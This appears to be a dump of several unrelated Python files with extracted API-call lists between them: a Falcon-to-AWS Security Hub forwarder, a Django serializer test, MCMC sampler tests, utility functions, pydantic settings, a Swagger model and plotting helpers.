                    ins_mac = iface.mac_address.lower().replace(":", "").replace("-", "")
                    if det_mac == ins_mac:
                        found = True
                if found: # pylint: disable=R1723
                    return region, ec2instance
            except ClientError:
                # Instance ID unknown in this region; try the next one.
                continue
            except Exception: # pylint: disable=W0703
                trace = traceback.format_exc()
                log.exception(str(trace))
                continue
        # Fall back to the configured region and whatever (possibly None)
        # instance object was last obtained.
        return report_region, ec2instance
    @staticmethod
    def send_to_securityhub(manifest):
        """Import ``manifest`` into Security Hub unless a finding with the
        same Id already exists; returns the batch-import response, or False
        when the finding was already present / never imported."""
        client = boto3.client('securityhub', region_name=config.get('aws', 'region'))
        check_response = {}
        found = False
        try:
            check_response = client.get_findings(Filters={'Id': [{'Value': manifest["Id"], 'Comparison': 'EQUALS'}]})
            for _ in check_response["Findings"]:
                found = True
        except ClientError:
            pass
        import_response = False
        if not found:
            try:
                import_response = client.batch_import_findings(Findings=[manifest])
            except ClientError as err:
                # Boto3 issue communicating with SH, throw the error in the log
                log.exception(str(err))
        return import_response
    def submit(self):
        """Resolve the EC2 instance for this detection and, when it is found,
        build the finding payload and send it to Security Hub."""
        log.info("Processing detection: %s", self.event.detect_description)
        det_region = config.get('aws', 'region')
        send = False
        try:
            if self.event.instance_id:
                det_region, instance = self.find_instance(self.event.instance_id, self.event.device_details["mac_address"])
                if instance is None:
                    log.warning("Instance %s with MAC address %s not found in regions searched. Alert not processed.",
                                self.event.instance_id, self.event.device_details["mac_address"])
                    return
                try:
                    for _ in instance.network_interfaces:
                        # Only send alerts for instances we can find
                        send = True
                except ClientError:
                    # Not our instance
                    i_id = self.event.instance_id
                    mac = self.event.device_details["mac_address"]
                    log.info("Instance %s with MAC address %s not found in regions searched. Alert not processed.", i_id, mac)
        except AttributeError:
            # Instance ID was not provided by the detection
            log.info("Instance ID not provided by detection. Alert not processed.")
        if send:
            sh_payload = self.create_payload(det_region)
            response = self.send_to_securityhub(sh_payload)
            if not response:
                log.info("Detection already submitted to Security Hub. Alert not processed.")
            else:
                if response["SuccessCount"] > 0:
                    submit_msg = f"Detection submitted to Security Hub. (Request ID: {response['ResponseMetadata']['RequestId']})"
                    log.info(submit_msg)
    def create_payload(self, instance_region):
        """Assemble the Security Hub ASFF finding dict for this detection.

        :param instance_region: region reported for the EC2 resource entry.
        """
        region = config.get('aws', 'region')
        try:
            account_id = boto3.client("sts").get_caller_identity().get('Account')
        except KeyError:
            # Failed to get endpoint_resolver the first time, try it again
            account_id = boto3.client("sts").get_caller_identity().get('Account')
        severity_product = self.event.severity_value
        # Falcon severity is 1-5; Security Hub "Normalized" expects 0-100.
        severity_normalized = severity_product * 20
        payload = {
            "SchemaVersion": "2018-10-08",
            "ProductArn": "arn:aws:securityhub:{}:517716713836:product/crowdstrike/crowdstrike-falcon".format(region),
            "AwsAccountId": account_id,
            "SourceUrl": self.event.falcon_link,
            "GeneratorId": "Falcon Host",
            "CreatedAt": datetime.utcfromtimestamp(float(self.event.event_create_time) / 1000.).isoformat() + 'Z',
            "UpdatedAt": ((datetime.utcfromtimestamp(datetime.timestamp(datetime.now()))).isoformat() + 'Z'),
            "RecordState": "ACTIVE",
            "Severity": {"Product": severity_product, "Normalized": severity_normalized}
        }
        # Instance ID based detail
        try:
            payload["Id"] = f"{self.event.instance_id}{self.event.event_id}"
            payload["Title"] = "Falcon Alert. Instance: %s" % self.event.instance_id
            # NOTE(review): "AwsEc2Instnace" is misspelled (should be
            # "AwsEc2Instance"); fixing it changes the emitted finding, so
            # confirm downstream consumers before changing the literal.
            payload["Resources"] = [{"Type": "AwsEc2Instnace", "Id": self.event.instance_id, "Region": instance_region}]
        except AttributeError:
            payload["Id"] = f"UnknownInstanceID:{self.event.event_id}"
            payload["Title"] = "Falcon Alert"
            payload["Resources"] = [{"Type": "Other",
                                     "Id": f"UnknownInstanceId:{self.event.event_id}",
                                     "Region": region
                                     }]
        # Description
        aws_id = ""
        if self.event.cloud_provider_account_id:
            aws_id = f"| AWS Account for alerting instance: {self.event.cloud_provider_account_id}"
        payload["Description"] = f"{self.event.detect_description} {aws_id}"
        # TTPs
        try:
            payload["Types"] = ["Namespace: TTPs",
                                "Category: %s" % self.event.original_event["event"]["Tactic"],
                                "Classifier: %s" % self.event.original_event["event"]["Technique"]
                                ]
        except KeyError:
            payload.pop("Types", None)
        # Running process detail
        try:
            payload["Process"] = {}
            payload["Process"]["Name"] = self.event.original_event["event"]["FileName"]
            payload["Process"]["Path"] = self.event.original_event["event"]["FilePath"]
        except KeyError:
            payload.pop("Process", None)
        # Network detail
        try:
            payload['Network'] = self.network_payload()
        except KeyError:
            pass
        return payload
    def network_payload(self):
        """Extract the first NetworkAccesses entry of the original event as a
        Security Hub Network block; raises KeyError when absent (caught by
        create_payload)."""
        net = {}
        net['Direction'] = \
            "IN" if self.event.original_event['event']['NetworkAccesses'][0]['ConnectionDirection'] == 0 else 'OUT'
        net['Protocol'] = self.event.original_event['event']['NetworkAccesses'][0]['Protocol']
        net['SourceIpV4'] = self.event.original_event['event']['NetworkAccesses'][0]['LocalAddress']
        net['SourcePort'] = self.event.original_event['event']['NetworkAccesses'][0]['LocalPort']
        net['DestinationIpV4'] = self.event.original_event['event']['NetworkAccesses'][0]['RemoteAddress']
        net['DestinationPort'] = self.event.original_event['event']['NetworkAccesses'][0]['RemotePort']
        return net
class Runtime():
    """Backend that forwards relevant Falcon detections to AWS Security Hub."""
    def __init__(self):
        log.info("AWS Backend is enabled.")
    def is_relevant(self, falcon_event): # pylint: disable=R0201
        """Only detections originating from EC2 instances are handled here."""
        is_ec2 = falcon_event.cloud_provider == 'AWS_EC2'
        return is_ec2
    def process(self, falcon_event): # pylint: disable=R0201
        """Build and submit a Security Hub finding for the event."""
        submitter = Submitter(falcon_event)
        submitter.submit()
__all__ = ['Runtime']
| [
"traceback.format_exc",
"boto3.resource",
"boto3.client",
"datetime.datetime.now"
] | [((511, 530), 'boto3.client', 'boto3.client', (['"""ec2"""'], {}), "('ec2')\n", (523, 530), False, 'import boto3\n'), ((676, 717), 'boto3.resource', 'boto3.resource', (['"""ec2"""'], {'region_name': 'region'}), "('ec2', region_name=region)\n", (690, 717), False, 'import boto3\n'), ((1420, 1442), 'traceback.format_exc', 'traceback.format_exc', ([], {}), '()\n', (1440, 1442), False, 'import traceback\n'), ((4281, 4300), 'boto3.client', 'boto3.client', (['"""sts"""'], {}), "('sts')\n", (4293, 4300), False, 'import boto3\n'), ((4463, 4482), 'boto3.client', 'boto3.client', (['"""sts"""'], {}), "('sts')\n", (4475, 4482), False, 'import boto3\n'), ((5125, 5139), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (5137, 5139), False, 'from datetime import datetime\n')] |
import pytest
from buyer import serializers
@pytest.mark.django_db
def test_buyer_deserialization():
    """A full payload should validate and every field should be persisted."""
    payload = {
        'email': '<EMAIL>',
        'name': '<NAME>',
        'sector': 'AEROSPACE',
        'company_name': 'Example corp',
        'country': 'China',
    }
    serializer = serializers.BuyerSerializer(data=payload)
    assert serializer.is_valid()
    instance = serializer.save()
    for field in ('email', 'name', 'sector', 'company_name', 'country'):
        assert getattr(instance, field) == payload[field]
| [
"buyer.serializers.BuyerSerializer"
] | [((294, 332), 'buyer.serializers.BuyerSerializer', 'serializers.BuyerSerializer', ([], {'data': 'data'}), '(data=data)\n', (321, 332), False, 'from buyer import serializers\n')] |
#1d_tests.py
import autograd.numpy as np
import autograd.scipy.stats.norm as norm
from copy import copy
import datetime as dt
from matplotlib import pyplot as plt
import seaborn as sns
import sys; sys.path.append('..')
from mcmc import langevin, MALA, RK_langevin, RWMH, HMC
def bimodal_logprob(z):
    """Unnormalised log-density of a multimodal 1-d target:
    log sin^2(z) + log sin^2(2z) + standard-normal log-pdf, flattened."""
    log_sin_sq = np.log(np.sin(z) ** 2)
    log_sin_2z_sq = np.log(np.sin(2 * z) ** 2)
    return (log_sin_sq + log_sin_2z_sq + norm.logpdf(z)).ravel()
def main():
    """Run five MCMC samplers on the 1-d bimodal target and plot the
    resulting sample histograms against the (unnormalised) density."""
    #====== Setup =======
    n_iters, n_samples = 2500, 500
    # One chain per sample, initialised from a standard normal.
    init_vals = np.random.randn(n_samples, 1)
    allsamps = []
    logprob = bimodal_logprob
    #====== Tests =======
    # NOTE(review): `t` is not reset between the first three samplers, so the
    # elapsed times printed for MALA and langevin_RK are cumulative from the
    # start — confirm whether per-sampler timing was intended.
    t = dt.datetime.now()
    print('running 1d tests ...')
    samps = langevin(logprob, copy(init_vals),
        num_iters = n_iters, num_samples = n_samples, step_size = 0.05)
    print('done langevin in', dt.datetime.now()-t,'\n')
    allsamps.append(samps)
    samps = MALA(logprob, copy(init_vals),
        num_iters = n_iters, num_samples = n_samples, step_size = 0.05)
    print('done MALA in', dt.datetime.now()-t,'\n')
    allsamps.append(samps)
    samps = RK_langevin(logprob, copy(init_vals),
        num_iters = n_iters, num_samples = n_samples, step_size = 0.01)
    print('done langevin_RK in', dt.datetime.now()-t,'\n')
    allsamps.append(samps)
    t = dt.datetime.now()
    samps = RWMH(logprob, copy(init_vals),
        num_iters = n_iters, num_samples = n_samples, sigma = 0.5)
    print('done RW MH in' , dt.datetime.now()-t,'\n')
    allsamps.append(samps)
    t = dt.datetime.now()
    # HMC takes 5 leapfrog steps per iteration, hence n_iters//5 iterations.
    samps = HMC(logprob, copy(init_vals),
        num_iters = n_iters//5, num_samples = n_samples,
        step_size = 0.05, num_leap_iters=5)
    print('done HMC in', dt.datetime.now()-t,'\n')
    allsamps.append(samps)
    #====== Plotting =======
    # One row per sampler: histogram of samples, sample rug (red x), and the
    # target density (orange) overlaid on twin axes.
    lims = [-5,5]
    names = ['langevin', 'MALA', 'langevin_RK', 'RW MH', 'HMC']
    f, axes = plt.subplots(len(names), sharex=True)
    for i, (name, samps) in enumerate(zip(names, allsamps)):
        sns.distplot(samps, bins=1000, kde=False, ax=axes[i])
        axb = axes[i].twinx()
        axb.scatter(samps, np.ones(len(samps)), alpha=0.1, marker='x', color='red')
        axb.set_yticks([])
        zs = np.linspace(*lims, num=250)
        axes[i].twinx().plot(zs, np.exp(bimodal_logprob(zs)), color='orange')
        axes[i].set_xlim(*lims)
        title = name
        axes[i].set_title(title)
    plt.show()
if __name__ == '__main__':
main() | [
"autograd.numpy.sin",
"seaborn.distplot",
"autograd.numpy.linspace",
"autograd.scipy.stats.norm.logpdf",
"datetime.datetime.now",
"autograd.numpy.random.randn",
"copy.copy",
"sys.path.append",
"matplotlib.pyplot.show"
] | [((200, 221), 'sys.path.append', 'sys.path.append', (['""".."""'], {}), "('..')\n", (215, 221), False, 'import sys\n'), ((467, 496), 'autograd.numpy.random.randn', 'np.random.randn', (['n_samples', '(1)'], {}), '(n_samples, 1)\n', (482, 496), True, 'import autograd.numpy as np\n'), ((570, 587), 'datetime.datetime.now', 'dt.datetime.now', ([], {}), '()\n', (585, 587), True, 'import datetime as dt\n'), ((1197, 1214), 'datetime.datetime.now', 'dt.datetime.now', ([], {}), '()\n', (1212, 1214), True, 'import datetime as dt\n'), ((1403, 1420), 'datetime.datetime.now', 'dt.datetime.now', ([], {}), '()\n', (1418, 1420), True, 'import datetime as dt\n'), ((2196, 2206), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2204, 2206), True, 'from matplotlib import pyplot as plt\n'), ((646, 661), 'copy.copy', 'copy', (['init_vals'], {}), '(init_vals)\n', (650, 661), False, 'from copy import copy\n'), ((834, 849), 'copy.copy', 'copy', (['init_vals'], {}), '(init_vals)\n', (838, 849), False, 'from copy import copy\n'), ((1025, 1040), 'copy.copy', 'copy', (['init_vals'], {}), '(init_vals)\n', (1029, 1040), False, 'from copy import copy\n'), ((1238, 1253), 'copy.copy', 'copy', (['init_vals'], {}), '(init_vals)\n', (1242, 1253), False, 'from copy import copy\n'), ((1443, 1458), 'copy.copy', 'copy', (['init_vals'], {}), '(init_vals)\n', (1447, 1458), False, 'from copy import copy\n'), ((1840, 1893), 'seaborn.distplot', 'sns.distplot', (['samps'], {'bins': '(1000)', 'kde': '(False)', 'ax': 'axes[i]'}), '(samps, bins=1000, kde=False, ax=axes[i])\n', (1852, 1893), True, 'import seaborn as sns\n'), ((2025, 2052), 'autograd.numpy.linspace', 'np.linspace', (['*lims'], {'num': '(250)'}), '(*lims, num=250)\n', (2036, 2052), True, 'import autograd.numpy as np\n'), ((760, 777), 'datetime.datetime.now', 'dt.datetime.now', ([], {}), '()\n', (775, 777), True, 'import datetime as dt\n'), ((944, 961), 'datetime.datetime.now', 'dt.datetime.now', ([], {}), '()\n', (959, 961), True, 'import 
datetime as dt\n'), ((1141, 1158), 'datetime.datetime.now', 'dt.datetime.now', ([], {}), '()\n', (1156, 1158), True, 'import datetime as dt\n'), ((1346, 1363), 'datetime.datetime.now', 'dt.datetime.now', ([], {}), '()\n', (1361, 1363), True, 'import datetime as dt\n'), ((1576, 1593), 'datetime.datetime.now', 'dt.datetime.now', ([], {}), '()\n', (1591, 1593), True, 'import datetime as dt\n'), ((360, 374), 'autograd.scipy.stats.norm.logpdf', 'norm.logpdf', (['z'], {}), '(z)\n', (371, 374), True, 'import autograd.scipy.stats.norm as norm\n'), ((319, 328), 'autograd.numpy.sin', 'np.sin', (['z'], {}), '(z)\n', (325, 328), True, 'import autograd.numpy as np\n'), ((342, 355), 'autograd.numpy.sin', 'np.sin', (['(2 * z)'], {}), '(2 * z)\n', (348, 355), True, 'import autograd.numpy as np\n')] |
import qrcode

# Content to encode (here: a URL) and the image file it is written to.
data = "www.google.com"
file_name = "qrcode.png"

# Render the QR code and persist it to disk as an image.
qr_image = qrcode.make(data=data)
qr_image.save(file_name)
| [
"qrcode.make"
] | [((118, 140), 'qrcode.make', 'qrcode.make', ([], {'data': 'data'}), '(data=data)\n', (129, 140), False, 'import qrcode\n')] |
"""
Low level miscilanious calls
"""
import UserDict
import types
import random
import datetime
import pprint
import re
import unicodedata
import logging
log = logging.getLogger(__name__)
# Module-level hook: when set to a datetime, now() reports it instead of the
# real clock (set via set_now(); used by automated tests).
now_override = None
def now():
    """
    Return the current datetime, or the fake one installed via set_now().
    Lets automated tests fake the current datetime.
    """
    return now_override if now_override else datetime.datetime.now()
def set_now(new_now_override=None):
    """
    Install a fake "current time" for now(); anything that is not a
    datetime instance (including the default None) clears the override.
    """
    global now_override
    if isinstance(new_now_override, datetime.datetime):
        now_override = new_now_override
    else:
        now_override = None
def timedelta_from_str(string_args):
    """
    Convert a string of comma separated timedelta kwargs into a timedelta object.

    Non-string input (e.g. an existing timedelta) is passed through unchanged;
    strings that parse to a non-positive duration yield None.
    NOTE(review): relies on the Python 2 ``basestring`` builtin.

    >>> timedelta_from_str( "hours=10" ) == datetime.timedelta( hours=10)
    True
    >>> timedelta_from_str("days = 10, hours = 10" ) == datetime.timedelta(days=10, hours=10)
    True
    >>> timedelta_from_str(datetime.timedelta(minutes=1)) == datetime.timedelta(minutes=1 )
    True
    """
    if isinstance(string_args, basestring):
        # "days = 10, hours = 10" -> timedelta(days=10, hours=10)
        d = datetime.timedelta(**dict([(kwarg.split('=')[0].strip(), int(kwarg.split('=')[1].strip())) for kwarg in string_args.split(',')]))
        # Only positive durations are considered valid.
        if isinstance(d, datetime.timedelta) and d.total_seconds()>0:
            return d
        else:
            return None
    return string_args
def timedelta_to_str(t):
    """
    Convert a timedelta object to a string representation that
    timedelta_from_str() can parse back.

    >>> timedelta_to_str(datetime.timedelta( hours=10))
    'hours=10'
    >>> timedelta_to_str(datetime.timedelta(days=5, hours=10)) in ['days=5,hours=10', 'hours=10,days=5']
    True
    >>> timedelta_to_str(datetime.timedelta(minutes=1 ))
    'minutes=1'
    """
    # Work in integer milliseconds: the previous version stored the
    # *fractional seconds* under the 'milliseconds' key (e.g. 0.5 instead of
    # 500), which did not round-trip through timedelta(milliseconds=...).
    remaining = int(round(t.total_seconds() * 1000))
    parts = {}
    for key, div in [('milliseconds', 1000), ('seconds', 60), ('minutes', 60),
                     ('hours', 24), ('days', 7), ('weeks', None)]:
        if div:
            val = remaining % div
            remaining //= div
        else:
            # Last unit absorbs whatever is left.
            val = remaining
            remaining = 0
        if val:
            parts[key] = val
    # .items() (not the Python-2-only .iteritems()) keeps this portable.
    return ",".join('='.join((key, str(value))) for key, value in parts.items())
def random_string(length=8):
    """
    Generate a random string of a-z A-Z 0-9
    (Without vowels to stop bad words from being generated!)

    >>> len(random_string())
    8
    >>> len(random_string(10))
    10

    If random, it should compress pretty badly:

    >>> import zlib
    >>> len(zlib.compress(random_string(100))) > 50
    True
    """
    random_symbols = '1234567890bcdfghjklmnpqrstvwxyzBCDFGHJKLMNPQRSTVWXYZ'
    # random.choice + str.join instead of manual index arithmetic.
    return ''.join(random.choice(random_symbols) for _ in range(length))
def str_to_int(text, default=0):
    """
    Best-effort int() conversion; unconvertible input yields ``default``.

    >>> str_to_int("3")
    3
    >>> str_to_int("moo")
    0
    >>> str_to_int(None)
    0
    >>> str_to_int(str_to_int)
    0
    >>> str_to_int("cake", default=6)
    6
    """
    try:
        result = int(text)
    except (TypeError, ValueError):
        result = default
    return result
def calculate_age(born):
    """
    Number of whole years between ``born`` and today.

    http://www.fabent.co.uk/blog/2007/08/04/calculating-age-in-python/

    >>> today = datetime.date.today()
    >>> ten_ago = datetime.date(today.year-10, today.month, today.day)
    >>> calculate_age(ten_ago)
    10
    >>> calculate_age(ten_ago - datetime.timedelta(days=3))
    10
    >>> calculate_age(ten_ago + datetime.timedelta(days=3))
    9
    >>> calculate_age(datetime.date.today())
    0
    >>> born_odd = datetime.date(2000, 2, 29)
    >>> calculate_age(born_odd) > 0
    True
    """
    today = datetime.date.today()
    try:
        birthday_this_year = born.replace(year=today.year)
    except ValueError:
        # Born on 29 February and the current year is not a leap year.
        birthday_this_year = datetime.date(today.year, born.month, born.day - 1)
    years = today.year - born.year
    # Subtract one if this year's birthday is still ahead of us.
    return years - 1 if birthday_this_year > today else years
def update_dict(dict_a, dict_b):
    """
    Because dict.update(d) does not return the new dict

    >>> a = {'a': 1, 'b': 2}
    >>> update_dict(a, {'b': 3, 'c': 3})
    {'a': 1, 'c': 3, 'b': 3}
    """
    for key in dict_b:
        dict_a[key] = dict_b[key]
    return dict_a
def obj_to_dict(obj, dict_fields):
    """
    Used to convert a python object to a python dict of strings, but only including requested fields

    dict_fields is a dictionary of functions
      if a key is set with a null (None) value - the attribute is read and checked to be a primitive type
      if a key is set with a function - that function is used to convert the object to a primitive type

    NOTE(review): Python 2 only — relies on ``types.IntType`` etc. and the
    ``unicode`` builtin.

    TODO: currently does not follow lists or dict, just string dumps .. could be useful in future to recursively call obj_to_dict

    >>> class a:
    ...     foo = "bar"
    ...     def __unicode__(self):
    ...         raise Exception('asdf')
    ...
    >>> b = a()
    >>> b.c = a()
    >>> obj_to_dict(b, {'foo': None})
    {'foo': u'bar'}
    >>> obj_to_dict(b, {'c': None})
    Traceback (most recent call last):
    ...
    Exception: Object types are not allowed in object dictionaries [c]
    """
    d = {}
    for field_name in dict_fields:
        field_processor = dict_fields[field_name]
        field_value = None
        if field_processor == None:
            # No processor: read the attribute directly ('' when missing).
            field_value = getattr(obj,field_name,'')
        elif type(field_processor)==types.FunctionType:
            field_value = field_processor(obj)
        if field_value:
            field_value_type = type(field_value)
            # Containers and plain numbers/bools pass through untouched.
            if hasattr(field_value,'keys') or hasattr(field_value, '__iter__'):
                pass
            elif field_value_type in [types.IntType, types.FloatType, types.BooleanType]:
                pass
            elif field_value_type == datetime.datetime:
                field_value = field_value.strftime("%Y-%m-%d %H:%M:%S")
            else:
                # Anything else must be string-convertible, otherwise reject it.
                try:
                    field_value = unicode(field_value)
                except:
                    raise Exception('Object types are not allowed in object dictionaries [%s]' % (field_name, ))
        d[field_name] = field_value
    return d
def args_to_tuple(*args, **kwargs):
    """
    Capture a call's positional and keyword arguments as an (args, kwargs) pair.

    >>> args_to_tuple()
    ((), {})
    >>> args_to_tuple("hello?")
    (('hello?',), {})
    >>> args_to_tuple("hello", name="dave")
    (('hello',), {'name': 'dave'})
    """
    return args, kwargs
def make_username(title):
    """
    turn a display name into a username: lowercase, non-word characters
    collapsed to "-", leading/trailing "-" stripped.
    NOTE(review): uses the Python 2 ``unicode`` builtin.

    >>> make_username("Bob's Cake Factory")
    'bob-s-cake-factory'
    """
    # GregM: Normalise unicode chars to ascii equivalents first before performing replace
    # Stops Si(a with a hat)n becoming si-n
    title = unicodedata.normalize("NFKD", unicode(title)).encode("ascii", "ignore")
    return re.sub("[^\w-]", "-", title.lower()).strip("-")
def debug_type(var):
    """Render a value as "<type>:<repr>" for debug output."""
    return "{0}:{1}".format(type(var), repr(var))
def substring_in(substrings, string_list):
    """
    Find a substrings in a list of string_list
    Think of it as
      is 'bc' in ['abc', 'def']
    NOTE(review): uses the Python 2 ``basestring`` builtin, and the
    TypeError message contains the typo "mustbe" (a runtime string, left
    unchanged here).

    >>> substring_in( 'bc' , ['abc','def','ghi'])
    True
    >>> substring_in( 'jkl' , ['abc','def','ghi'])
    False
    >>> substring_in(['zx','hi'], ['abc','def','ghi'])
    True
    >>> substring_in(['zx','yw'], ['abc','def','ghi'])
    False
    """
    # Allow a single substring to be passed without wrapping it in a list.
    if isinstance(substrings, basestring):
        substrings = [substrings]
    if not isinstance(string_list, list) or not isinstance(substrings, list):
        raise TypeError('params mustbe lists')
    # Return on the first string that contains any of the substrings.
    for s in string_list:
        for ss in substrings:
            if ss in s:
                return True
return False | [
"logging.getLogger",
"datetime.datetime.now",
"datetime.date.today",
"datetime.date"
] | [((163, 190), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (180, 190), False, 'import logging\n'), ((409, 432), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (430, 432), False, 'import datetime\n'), ((3686, 3707), 'datetime.date.today', 'datetime.date.today', ([], {}), '()\n', (3705, 3707), False, 'import datetime\n'), ((3741, 3788), 'datetime.date', 'datetime.date', (['today.year', 'born.month', 'born.day'], {}), '(today.year, born.month, born.day)\n', (3754, 3788), False, 'import datetime\n'), ((3835, 3886), 'datetime.date', 'datetime.date', (['today.year', 'born.month', '(born.day - 1)'], {}), '(today.year, born.month, born.day - 1)\n', (3848, 3886), False, 'import datetime\n')] |
import os
from pydantic import BaseSettings
class AppSettings(BaseSettings):
    # Core application options (pydantic BaseSettings, so each field can be
    # overridden via an environment variable of the same name).
    debug: bool = False
    time_zone: str = "Asia/Shanghai"
    logger_level: str = "INFO"
    logger_formatter: str = "%(asctime)s [%(name)s] %(funcName)s[line:%(lineno)d] %(levelname)-7s: %(message)s"
    # NOTE(review): hard-coded secret default — should come from the
    # environment in production deployments.
    secret_key: str = "1@3$5^7*9)"
secret_key: str = "1@3$5^7*9)"
class DatabaseSettings(BaseSettings):
    # Async PostgreSQL connection string for the "fastapi" database.
    _db_port = os.getenv("POSTGRESQL_PORT") or "5432"
    # NOTE(review): the Postgres password is read from REDIS_PASSWORD —
    # looks like a copy/paste from RedisSettings; confirm whether
    # POSTGRESQL_PASSWORD was intended.
    _db_password = os.getenv("REDIS_PASSWORD") or "password"
    fastapi_uri: str = f"postgresql+asyncpg://postgres:{_db_password}@fastapi-postgresql:{_db_port}/fastapi"
class RedisSettings(BaseSettings):
    # Redis connection string (database 0, utf-8 responses).
    _redis_port = os.getenv("REDIS_PORT") or "6379"
    _redis_password = os.getenv("REDIS_PASSWORD") or "password"
    fastapi_redis_uri: str = f"redis://:{_redis_password}@fastapi-redis:{_redis_port}/0?encoding=utf-8"
class DataFileSettings(BaseSettings):
    # Filesystem locations for persistent data and runtime artefacts
    # (container paths).
    basedir: str = "/app/web/data"
    runtimedir: str = "/app/runtimedir"
# Aggregate settings object combining every settings group above.
class Settings(AppSettings, DatabaseSettings, RedisSettings, DataFileSettings):
    pass
settings = Settings()

# Overlay environment-specific values: for development/test runs, copy every
# attribute from the corresponding settings module onto the base settings
# object (only attributes that already exist on `settings` are applied).
env = os.getenv("FASTAPI_ENV")
print(f"FASTAPI_ENV = {env}")
if env == "development":
    from settings_dev import settings as dev_settings
    for k, v in dev_settings:
        if hasattr(settings, k):
            setattr(settings, k, v)
elif env == "test":
    from settings_test import settings as test_settings
    for k, v in test_settings:
        if hasattr(settings, k):
            setattr(settings, k, v)
| [
"os.getenv"
] | [((1078, 1102), 'os.getenv', 'os.getenv', (['"""FASTAPI_ENV"""'], {}), "('FASTAPI_ENV')\n", (1087, 1102), False, 'import os\n'), ((374, 402), 'os.getenv', 'os.getenv', (['"""POSTGRESQL_PORT"""'], {}), "('POSTGRESQL_PORT')\n", (383, 402), False, 'import os\n'), ((432, 459), 'os.getenv', 'os.getenv', (['"""REDIS_PASSWORD"""'], {}), "('REDIS_PASSWORD')\n", (441, 459), False, 'import os\n'), ((638, 661), 'os.getenv', 'os.getenv', (['"""REDIS_PORT"""'], {}), "('REDIS_PORT')\n", (647, 661), False, 'import os\n'), ((694, 721), 'os.getenv', 'os.getenv', (['"""REDIS_PASSWORD"""'], {}), "('REDIS_PASSWORD')\n", (703, 721), False, 'import os\n')] |
# coding: utf-8
"""
Layered Insight Assessment, Compliance, Witness & Control
LI Assessment & Compliance performs static vulnerability analysis, license and package compliance. LI Witness provides deep insight and analytics into containerized applications. Control provides dynamic runtime security and analytics for containerized applications. You can find out more about the Layered Insight Suite at [http://layeredinsight.com](http://layeredinsight.com).
OpenAPI spec version: 0.10
Contact: <EMAIL>
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class AlertEvents(object):
    """Swagger-generated model: event counts for one alert time bucket.

    NOTE: This class is auto generated by the swagger code generator
    program; edit with care.

    Attributes:
        swagger_types (dict): attribute name -> attribute type.
        attribute_map (dict): attribute name -> json key in definition.
    """

    swagger_types = {
        'id': 'float',
        'events': 'float',
        'event_i_ds': 'list[str]'
    }

    attribute_map = {
        'id': 'ID',
        'events': 'Events',
        'event_i_ds': 'EventIDs'
    }

    def __init__(self, id=None, events=None, event_i_ds=None):
        """AlertEvents - a model defined in Swagger"""
        self._id = None
        self._events = None
        self._event_i_ds = None
        # Route caller-supplied values through the property setters,
        # skipping anything left unset.
        for attr_name, value in (('id', id), ('events', events),
                                 ('event_i_ds', event_i_ds)):
            if value is not None:
                setattr(self, attr_name, value)

    @property
    def id(self):
        """Position of this event (basically an array key).

        :rtype: float
        """
        return self._id

    @id.setter
    def id(self, id):
        """Set the position of this event (basically an array key)."""
        self._id = id

    @property
    def events(self):
        """Number of events in this time period.

        :rtype: float
        """
        return self._events

    @events.setter
    def events(self, events):
        """Set the number of events in this time period."""
        self._events = events

    @property
    def event_i_ds(self):
        """12 character internal hexadecimal identifiers for Events in this time period.

        :rtype: list[str]
        """
        return self._event_i_ds

    @event_i_ds.setter
    def event_i_ds(self, event_i_ds):
        """Set the event identifiers for this time period."""
        self._event_i_ds = event_i_ds

    def to_dict(self):
        """Returns the model properties as a dict"""
        result = {}
        for attr in self.swagger_types:
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = [item.to_dict() if hasattr(item, "to_dict") else item
                                for item in value]
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = {key: (val.to_dict() if hasattr(val, "to_dict") else val)
                                for key, val in value.items()}
            else:
                result[attr] = value
        return result

    def to_str(self):
        """Returns the string representation of the model"""
        return pformat(self.to_dict())

    def __repr__(self):
        """For `print` and `pprint`"""
        return self.to_str()

    def __eq__(self, other):
        """Returns true if both objects are equal"""
        return isinstance(other, AlertEvents) and self.__dict__ == other.__dict__

    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        return not self == other
| [
"six.iteritems"
] | [((3539, 3568), 'six.iteritems', 'iteritems', (['self.swagger_types'], {}), '(self.swagger_types)\n', (3548, 3568), False, 'from six import iteritems\n')] |
'''
Different utils used by plotters.
'''
import mpl_toolkits.basemap as bm
import matplotlib.pyplot as pl
from matplotlib import colors, cm
import scipy as sp
# Make spectral plot
def my_psd(x):
    """Plot the power spectral density of ``x`` against a period axis.

    Frequency is converted to a period-like quantity T = 2/f; only T >= 12
    is kept and the axis is labelled in years after dividing by 12 —
    presumably the input is sampled monthly (TODO confirm).
    NOTE(review): pl.psd draws its own plot, hence the immediate pl.clf()
    before re-plotting — confirm this is intended.
    """
    P,f=pl.psd(x); pl.clf()
    # Convert frequency to period; keep only periods of a year or longer.
    T=2./f; ind= T>=12.
    pl.plot(T[ind]/12,P[ind]);
    ax=pl.gca();
    ax.set_xscale('log');
    #ax.set_xlim(1,20); ax.set_ylim(0,20);
    #tick=[1,2,3,5,10,20]; tickl=[str(i) for i in tick]
    #ax.set_xticks(tick); ax.set_xticklabels(tickl);
    ax.set_xlabel('Period, years'); ax.set_ylabel('Power');
    ax.set_title('Power spectral density');
# Contour plot
def contour(x, y, z, func=pl.contourf, black=None, **opts):
    '''
    Adds a "black" functionality to default contour function.

    Wraps ``func`` (default ``pl.contourf``); when ``black`` is given, a
    norm/cmap pair is injected into ``opts`` so the colormap marks the
    normalized position of ``black``. Caller-supplied ``norm``/``cmap``/
    ``levels`` in ``opts`` take precedence. Returns the contour set.
    '''
    # "is not None" instead of "!= None": comparing an array to None with
    # != yields an element-wise array and breaks truth testing.
    if black is not None:
        clevs = opts.get('levels', None)
        if clevs is not None:
            vmin = clevs[0]; vmax = clevs[-1]
        else:
            # Renamed from min/max to avoid shadowing the builtins.
            vmin = sp.ma.minimum(z); vmax = sp.ma.maximum(z)
        # NOTE(review): colors.normalize was removed in modern matplotlib
        # (colors.Normalize there); left as-is for the pinned version.
        norm = opts.get('norm', colors.normalize(vmin, vmax))
        cmap = opts.get('cmap', MyCmap(cm.get_cmap(), black=norm(black)))
